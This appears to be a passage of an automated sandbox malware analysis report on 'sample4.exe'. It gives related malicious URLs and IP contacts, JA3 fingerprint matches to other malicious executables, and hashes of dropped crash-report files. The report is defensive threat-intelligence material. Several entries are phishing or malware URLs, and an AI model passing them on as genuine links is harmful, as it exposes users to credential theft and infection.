                                                                                                                                                                                                                                                              http://www.secured-mailsharepoint.online/Get hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.130
                                                                                                                                                                                                                                                              https://www.ensonoelevate2021.com/event/8e8c2672-3b18-40b1-8efc-026ab72e6424/summary?environment=P2&5S%2CM3%2C8e8c2672-3b18-40b1-8efc-026ab72e6424=Get hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.5
                                                                                                                                                                                                                                                              https://cypressbayhockey.com/NOGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.197
                                                                                                                                                                                                                                                              details.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.5
                                                                                                                                                                                                                                                              details.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.5
                                                                                                                                                                                                                                                              https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/?utm_source=redcanary&utm_medium=email&utm_campaign=Blog%20Digest-2020-11-05T09:00:54.888-07:00&mkt_tok=eyJpIjoiWmpKbVlUTXpPRGMzTTJRMSIsInQiOiJtMm9iYWJESHd5VldFUTF2a05zeEdtVUdMNms3cHVcL01OcW9hYUlwOElYZFwvNkdvd0UzV0x2SDdNZVlIMWFTSG1jS28zM0JIamh3YXRvcmU0K2htaTJpTlFLbjNNaWswT2NxYlhXdElEZHVzMlFaclpoTUFzZk1ibTV0SGVwSCs2In0%3DGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.133
                                                                                                                                                                                                                                                              https://patrickphimr5.github.io/memoaideivozx/dsfriet.html?bbre=dxcfdgoissGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.65
                                                                                                                                                                                                                                                              https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9Get hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.3
                                                                                                                                                                                                                                                              http://aypf.z2systems.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.193
                                                                                                                                                                                                                                                              https://create.piktochart.com/output/51658503-cfo-capabelGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.2
                                                                                                                                                                                                                                                              https://protect-us.mimecast.com/s/JFIWCVON1NCzq3ggtGInaqGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.67
                                                                                                                                                                                                                                                              http://g1security.co.tzGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.129
                                                                                                                                                                                                                                                              https://numisconsult.com/blog/e47c4b8720db7445599988579a03c7c5Get hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              http://search.hshipmenttracker.coGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.197
                                                                                                                                                                                                                                                              https://sosefinawinnifredsullivan8-5ce0e.gr8.com/Get hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              https://t.co/2QNQz4sNnh?amp=1Get hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.69
                                                                                                                                                                                                                                                              https://omsd-org.gq/?login=do&c=E,1,MTY2COfqGo5C-H4KALYqrUyXXPpd2evSCW3stb24PsdKe8xYdoYVhcjchdnzpUCr95AnX7X4QDVSQFpJtN_EpMZ8u2smwVQNUpYGz7Etn-l-NVb_st2_649iVg,,&typo=1Get hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.197
                                                                                                                                                                                                                                                              http://www.cqdx.ruGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.193
                                                                                                                                                                                                                                                              http://kikicustomwigs.com/inefficient.phpGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.5

                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                              ce5f3254611a8c095a3d821d44539877WFLPGBTMZH.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              Customer_Receivables_Aging_20210112_2663535345242424242.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              Listings.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              Transferencia,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              Dhl Client Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              64D5aP6jQz.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              New inquiry CON 20-10630.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              RLFGB8pdA6.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              ORDER#9403.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              CLIDSXX.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              SecuriteInfo.com.Variant.Graftor.893032.186.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              ptrb-ES-2999223.msiGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              T9tAui44l4.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              E8Jkw96qFU.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              SecuriteInfo.com.Trojan.DownLoader36.32796.17922.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              y46XVvLaVc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              Softerra Adaxes 2011.3.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              r0u.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131
                                                                                                                                                                                                                                                              r0u.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                              • 104.244.42.131

                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_023208c1\Report.wer
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):12180
                                                                                                                                                                                                                                                              Entropy (8bit):3.7757129548768527
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:4nnLHJPBHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNq9:gDJP/H56rQjzEfKXR/u7sxS274Itxpq
                                                                                                                                                                                                                                                              MD5:F33A74C78B60DE4948ABD5FCA62C8C1D
                                                                                                                                                                                                                                                              SHA1:6DAAA0FBCDF61CA7594A921A457A0CB428B16CD0
                                                                                                                                                                                                                                                              SHA-256:7514782350B6350389B11D177F2F9CB6CABB95F4AEC9E8377EA9248A1722710B
                                                                                                                                                                                                                                                              SHA-512:25E287B740FC747C4646DBC5CF1E80EE6384608864AD305711DAC723D099BCF78A4F2ADD7D4AEB6B1D99D01E3EA215275D2D75922885F171A827180B2F3E5258
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.6.1.3.3.4.6.1.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.5.0.1.7.1.e.-.c.7.a.3.-.4.6.b.a.-.b.c.8.5.-.2.2.a.8.f.7.6.b.b.f.2.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.1.7.c.2.6.2.-.0.1.5.3.-.4.5.2.c.-.b.7.6.6.-.5.8.7.5.9.a.0.7.8.d.5.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_058db978\Report.wer
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):12080
                                                                                                                                                                                                                                                              Entropy (8bit):3.7723760710787007
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:YOIarJPFHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqy:6EJPbH56rQjzEfKXR/u7sWS274Itxp6
                                                                                                                                                                                                                                                              MD5:8549CFB0ABB89E6BA07A896B3BAEB4FF
                                                                                                                                                                                                                                                              SHA1:47BE65FFBEFFAB2884B681F321D4E329A339F28F
                                                                                                                                                                                                                                                              SHA-256:36614A01566DE26BCAEC36177422C484B9ED2A5FAA8061A7D528680323D0346C
                                                                                                                                                                                                                                                              SHA-512:B7B09418ACBE27182027B3FBAE153444AF2CB6FC5F39002D59546B583A4948A660FDC9F75D1802429071539830D0E4794E0473B06BD910DBAC300E72C67124A5
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.4.2.2.4.0.9.1.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.c.a.1.6.6.0.-.2.6.1.0.-.4.1.e.8.-.b.8.4.2.-.5.0.d.3.e.2.3.6.3.a.f.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.d.0.d.3.9.4.-.c.d.b.f.-.4.d.a.6.-.b.2.d.9.-.0.e.5.c.4.d.d.5.2.e.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_13ce361a\Report.wer
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):12384
                                                                                                                                                                                                                                                              Entropy (8bit):3.775237108429829
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:g9HQJPrHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqEY:PJP1H56rQjzEfKX0/u7sxS274Itxpv
                                                                                                                                                                                                                                                              MD5:A83850FBB51EE9A273A439B5D0CEE57E
                                                                                                                                                                                                                                                              SHA1:379A2AA130BF3AA164B9FF6C1E09508E4C21D122
                                                                                                                                                                                                                                                              SHA-256:A66236E86CF2B98ABAC970EF37589CB14E684DF8AAF6928EF58D4C563EBB4F7E
                                                                                                                                                                                                                                                              SHA-512:DA8583D262A7139EC32D20E9CDBAE2FC5F0A948F4889CCA9467286B5F5AABBF2E801D823767A3EF7F146AA4C62947842030DD25533F898DEFA163A1555E192E7
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.7.4.1.4.7.0.9.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.5.b.1.3.a.7.-.1.0.3.c.-.4.c.5.a.-.b.b.3.5.-.8.e.e.d.6.5.6.7.8.1.c.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.b.e.6.5.1.e.-.8.5.e.0.-.4.6.1.5.-.9.f.4.6.-.c.f.9.8.4.8.6.2.c.5.8.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_16da5cdc\Report.wer
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):13300
                                                                                                                                                                                                                                                              Entropy (8bit):3.7692678717959778
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:1q5DJPmHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqEg:iJPAH56rQjzEfKX1r/u7sxS274Itxpo
                                                                                                                                                                                                                                                              MD5:39D1F56E6FF74B3E803A3DB436DC0567
                                                                                                                                                                                                                                                              SHA1:D353F7D0519C76D8CA38ADA8DF241FC8186AF0F8
                                                                                                                                                                                                                                                              SHA-256:ED3D8B5ED2B208991F4041604523D134C2939875FEB9DD22DA31FC5956FECF3C
                                                                                                                                                                                                                                                              SHA-512:C7395B8FA4F20D0EA4BB8A686AE625BE3352EC6A42AF74A0DBD9AA0E475D2009B5CEE2AE9D725C989D4C16B58390C02F4AC4FD11D39972A2CB683A6F0B516226
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.8.2.6.1.5.8.5.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.6.8.4.b.1.f.-.b.5.a.a.-.4.0.5.d.-.a.c.b.b.-.8.a.d.9.c.6.c.4.f.1.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.c.4.b.4.d.0.-.2.5.0.d.-.4.4.b.5.-.a.8.4.3.-.0.e.5.9.1.7.e.2.2.0.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sample4.exe_45365feab801c9585ad9627648598a0b3f59_b2de38ec_177de25c\Report.wer
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):12082
                                                                                                                                                                                                                                                              Entropy (8bit):3.773622159663461
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:SzwJPCHQToA7Rb6tpXIQcQnc6rCcEhcw3r7+HbHg/PtuuzOOFLMbsWoxMfpNqE6T:uwJPEH56rQjzEfKXR/u7sWS274ItxpX
                                                                                                                                                                                                                                                              MD5:F9DE8B024B8D805B8F53277DADEC61E5
                                                                                                                                                                                                                                                              SHA1:EC6E575FD9A307A7263744CCE43F6050E08FFC83
                                                                                                                                                                                                                                                              SHA-256:8F9EF602CEB6BBA4CDA441F993EFA97E087D84DADFB4D4D183E7FD0EC7B36E03
                                                                                                                                                                                                                                                              SHA-512:05322EF2B9BFB4BC0F26FC17E255EEC6968D2AC59114E3AC08D63C7F8B516A7C7FCB32276F98136AB81B1ECF963FBA0EB97511802471E5235A6FAB03D8C7B80B
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.5.0.9.9.4.5.0.3.5.0.2.7.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.7.7.e.e.3.6.-.e.0.4.0.-.4.5.a.f.-.b.0.c.f.-.4.2.f.5.3.c.d.1.3.3.1.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.0.4.a.b.e.3.-.2.f.2.f.-.4.9.a.d.-.9.f.c.7.-.f.1.1.1.3.f.f.f.c.4.f.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.a.m.p.l.e.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.r.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.3.4.-.0.0.0.1.-.0.0.1.7.-.c.7.f.b.-.d.e.2.b.6.d.e.a.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.8.a.f.e.e.8.1.a.7.5.1.5.4.c.b.b.d.8.a.0.f.f.7.c.2.f.6.3.6.9.d.0.0.0.0.0.9.0.4.!.0.0.0.0.d.f.6.0.7.3.6.7.a.8.8.b.5.6.1.0.a.2.2.4.9.0.9.e.f.b.8.d.e.b.e.b.0.d.9.0.f.4.8.7.!.s.a.m.p.l.e.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.0.4././.0.7.:.1.0.:.4.4.:.1.6.!.0.!.s.a.m.p.l.e.4...
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BD.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8400
                                                                                                                                                                                                                                                              Entropy (8bit):3.6980603355241612
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:Rrl7r3GLNioq6I8J/6YSaSUGRPgmfGuSrCpBT89bGnqsfDxim:RrlsNit6I8R6YfSUGRPgmfGuSVGnJfp
                                                                                                                                                                                                                                                              MD5:C5C4C37BAB140B7F7183F1EA1184CD0A
                                                                                                                                                                                                                                                              SHA1:7E389311A6D7518BA8CE1D6FD27809934EA42140
                                                                                                                                                                                                                                                              SHA-256:67AEC99C834D15887E74691AB6993FB14CBADD5A0482E332D3AA2B8FC331F759
                                                                                                                                                                                                                                                              SHA-512:E2E7406119D4E6E7BDB497DC60BA97DA8F19BB1A85CD704EB7437788E98BD5F06C62FB06924387C1E74C32D9016263D10E87DDFCDDE16B1728B6CF2401D9D9DF
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER286E.tmp.dmp
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:35 2021, 0x1205a4 type
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):88980
                                                                                                                                                                                                                                                              Entropy (8bit):2.000024614163454
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:g7RA21BGylxzoEalrrZwyJPsVN1eIs6pkf7D13xqhaK7AT:glA2rGyXoEalrzPsP1eL9N40lT
                                                                                                                                                                                                                                                              MD5:8CBBD4DF28ED24D275A5B99871F0AEE4
                                                                                                                                                                                                                                                              SHA1:AC7743902178B19F482DF54F4D191E7EA41F41D5
                                                                                                                                                                                                                                                              SHA-256:98E94389C6B85400A3F28EE1252AFEF8B3864112FF1B729541518A55D9D07601
                                                                                                                                                                                                                                                              SHA-512:15935D5F2E9B3D88D74509ECEB017A12488C4ED823A8A010F0C0E801511340D02D9D86605DA13226C1342685C447BBE083BC348C10C5C3686BC210DFF5AF8E58
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Preview: MDMP....... .......S3.`...................U...........B....... ......GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER306E.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8400
                                                                                                                                                                                                                                                              Entropy (8bit):3.6977100771396483
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:Rrl7r3GLNioP6IL76YSVSUr6gmfGuSrCpB889bFnqsfx3m:RrlsNiA6IL76YASUr6gmfGuSoFnJfM
                                                                                                                                                                                                                                                              MD5:7BD3D3799E7832DB6E8F790D218F6198
                                                                                                                                                                                                                                                              SHA1:DA33CD235E2F88038F7299C0D9A486547489823E
